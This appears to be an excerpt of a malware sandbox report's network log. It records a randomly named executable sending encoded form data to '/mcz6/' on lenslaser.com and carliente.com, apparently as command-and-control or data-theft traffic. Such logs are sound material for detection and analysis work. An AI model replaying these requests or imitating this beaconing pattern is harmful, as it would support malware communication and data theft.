l65lvjLx=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtLHjHkHprj1bPVQPZVXuasL6RCag1QAAaBw==
Jun 6, 2024 13:26:09.497087002 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:26:09 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49754	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:11.375900984 CEST	764	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 65 69 66 64 70 42 64 44 39 54 61 34 6e 63 4c 47 74 39 69 65 78 64 5a 6e 2b 52 38 4b 78 71 53 59 34 3d Data Ascii: l65lvjLx=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LeifdpBdD9Ta4ncLGt9iexdZn+R8KxqSY4=
Jun 6, 2024 13:26:12.026194096 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:26:11 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49755	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:13.905622005 CEST	10846	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 71 73 64 41 6d 66 52 6e 57 57 38 4b 79 39 44 74 4a 62 56 51 73 56 56 35 76 43 44 6d 30 6e 30 74 56 78 55 6c 6e 6e 67 61 42 72 50 73 44 53 68 48 5a 36 77 38 67 61 44 4d 4c 4a 41 2b 4c 32 31 76 56 57 77 6e 44 46 75 4a 50 49 30 4d 6d 45 35 35 64 44 6a 48 38 6b 49 70 53 38 7a 52 56 41 75 6a 42 2f 58 57 61 54 35 5a 2b 47 46 74 62 66 4a 31 59 76 66 47 4e 39 33 69 76 71 61 66 6e 59 4d 51 56 4e 4b 43 65 45 7a 72 6f 4f 75 33 34 35 72 49 37 44 78 6c 5a 49 66 31 37 73 56 72 76 2f 2f [TRUNCATED] Data Ascii: l65lvjLx=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmJA6c1ITeci4n0YhR80dnFX/05Iy9Oj9FsNPbqpaLDmi3YfNNST5p+PKeCMWpJY1N94V+mSXs4Uetum8186Jrrf1ra8tSKMBWW/80AG489mE8xw5OBEDjc9WRnGqlVsIqFqsdAmfRnWW8Ky9DtJbVQsVV5vCDm0n0tVxUlnngaBrPsDShHZ6w8gaDMLJA+L21vVWwnDFuJPI0MmE55dDjH8kIpS8zRVAujB/XWaT5Z+GFtbfJ1YvfGN93ivqafnYMQVNKCeEzroOu345rI7DxlZIf17sVrv//6nWGO8Kx0ipKCYQyZJab/evwhRiIseNXwa05Vzbl/FOXpdiImkHALPA0mbmodT39B82ybKS0v/ZxcyB38b7sWbHUPRdiPUCKCGMUjcafEEjlndBoVHy/svcIzCiQWckYbwwiKTnU0P6Dws9bRTzGawVTuTFxKrkKHi3kpUAsjp9Tw0B4pMwPiKrkubL2T7JdGx37gQKJUjMmqfPulAYYqggN6PZWu2RH+mY0351E4x3gHSH/yPwJn3gV31T6yiVLgcTmZfcoLzIOk5avnbPZlZYfm9Bv7sE8rvNKgjgNvgxW2RKRndrdCmNv/AeZHz8qkrG8KrTTnrlqJaYlBVEf6xX75iGm4levZ+13QkoVYN5x71eQzkXWtZUlt2tAbN0VVTf0FT9jU/YEebAFybA8wkdhx4AUyMjX4Adn1ZkFAcoJ5WWxPjR2+r20Wy7LPPa2EHk86RGHNEsEVIMwtsbck1i7al4d1gcAUo1OUDALwpEw1KDpJa8Qy/2TJJok25pUSwrNR4nLVl7mIlk87j2tudjl4c/XKh16GRUBooUoxcgKP5y84w30ptKpwspIzGHUbkHK74B/uauWclSkNxAxCOrK8S9MBFNaxnl1hJqP6VW7TYYi7tPi8eJS4vzIaGR1MlR3pEgk5nmMIKxvz7/DxZs6vJKo7ptRX+ [TRUNCATED]
Jun 6, 2024 13:26:14.568348885 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:26:14 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49756	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:16.436568022 CEST	482	OUT	GET /mcz6/?l65lvjLx=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:26:17.104584932 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:26:17 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49757	217.160.0.111	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:22.205167055 CEST	744	OUT	POST /mcz6/ HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.carliente.com Referer: http://www.carliente.com/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4e 62 45 38 56 56 65 51 73 41 70 76 48 6c 35 75 76 6e 39 64 69 5a 78 70 34 6e 66 30 50 48 37 5a 52 65 56 68 59 79 79 61 43 32 62 52 38 4b 2f 4d 5a 64 49 39 47 77 59 6a 43 6f 30 77 38 32 45 72 6c 55 48 65 4e 4c 7a 50 58 47 30 36 48 66 39 72 66 79 6d 46 62 34 32 61 69 6e 62 57 56 61 76 45 4d 71 32 72 4d 47 31 70 70 42 64 30 37 51 49 43 50 4f 63 62 63 75 75 42 6c 7a 71 67 71 6c 39 72 71 70 34 45 70 36 30 45 6c 67 52 37 71 37 30 4e 43 58 76 4c 68 37 57 76 71 6a 6d 56 6b 2f 72 47 65 37 30 38 57 54 30 63 33 2f 55 6c 36 4c 62 48 4a 78 31 42 76 67 3d 3d Data Ascii: l65lvjLx=g0NNOeEZLnaHNbE8VVeQsApvHl5uvn9diZxp4nf0PH7ZReVhYyyaC2bR8K/MZdI9GwYjCo0w82ErlUHeNLzPXG06Hf9rfymFb42ainbWVavEMq2rMG1ppBd07QICPOcbcuuBlzqgql9rqp4Ep60ElgR7q70NCXvLh7WvqjmVk/rGe708WT0c3/Ul6LbHJx1Bvg==
Jun 6, 2024 13:26:23.035398960 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Thu, 06 Jun 2024 11:26:22 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jun 6, 2024 13:26:23.035444975 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49758	217.160.0.111	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:24.753305912 CEST	764	OUT	POST /mcz6/ HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.carliente.com Referer: http://www.carliente.com/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 76 5a 52 37 70 68 5a 33 53 61 46 32 62 52 7a 71 2f 46 58 39 49 4d 47 77 56 65 43 71 77 77 38 32 51 72 6c 55 33 65 4e 39 37 49 56 57 30 34 50 2f 39 31 53 53 6d 46 62 34 32 61 69 6a 37 38 56 5a 66 45 4e 61 47 72 4e 6c 74 32 6c 68 64 37 79 77 49 43 65 65 63 66 63 75 76 78 6c 79 47 61 71 67 35 72 71 6f 49 45 6f 6f 51 44 75 67 52 48 6c 62 31 74 4f 43 53 39 72 71 53 6d 33 51 4f 45 75 73 7a 48 66 39 6c 6d 48 69 56 4c 6c 2f 77 57 6e 4d 53 7a 45 79 49 49 30 6b 62 2b 70 42 77 73 31 75 37 31 39 6c 34 56 75 62 39 58 35 77 41 3d Data Ascii: l65lvjLx=g0NNOeEZLnaHL4c8W2GQ9wpuIF5ulH9ZiZNp4mbkP1vZR7phZ3SaF2bRzq/FX9IMGwVeCqww82QrlU3eN97IVW04P/91SSmFb42aij78VZfENaGrNlt2lhd7ywICeecfcuvxlyGaqg5rqoIEooQDugRHlb1tOCS9rqSm3QOEuszHf9lmHiVLl/wWnMSzEyII0kb+pBws1u719l4Vub9X5wA=
Jun 6, 2024 13:26:25.575438976 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Thu, 06 Jun 2024 11:26:25 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jun 6, 2024 13:26:25.575505018 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49759	217.160.0.111	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:27.280215025 CEST	10846	OUT	POST /mcz6/ HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.carliente.com Referer: http://www.carliente.com/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 33 5a 52 4a 78 68 62 57 53 61 45 32 62 52 74 36 2f 49 58 39 49 72 47 77 4d 5a 43 71 38 47 38 30 6f 72 6e 31 58 65 61 34 62 49 66 57 30 34 44 66 39 6f 66 79 6d 71 62 37 65 65 69 6e 58 38 56 5a 66 45 4e 59 65 72 4b 32 31 32 6e 68 64 30 37 51 49 4f 50 4f 63 37 63 75 32 4a 6c 79 7a 74 72 54 78 72 71 49 59 45 71 61 49 44 6e 67 52 2f 78 37 31 50 4f 43 57 75 72 75 7a 66 33 52 36 75 75 71 50 48 64 4c 34 72 65 54 4a 50 78 64 45 52 37 64 36 62 64 77 41 50 38 46 50 44 73 67 55 6e 70 65 79 59 77 30 5a 4e 72 4b 34 52 69 56 38 63 78 65 2b 58 50 37 6b 2b 68 55 70 74 2f 42 30 65 2f 62 69 55 64 2b 35 50 64 43 58 49 66 56 37 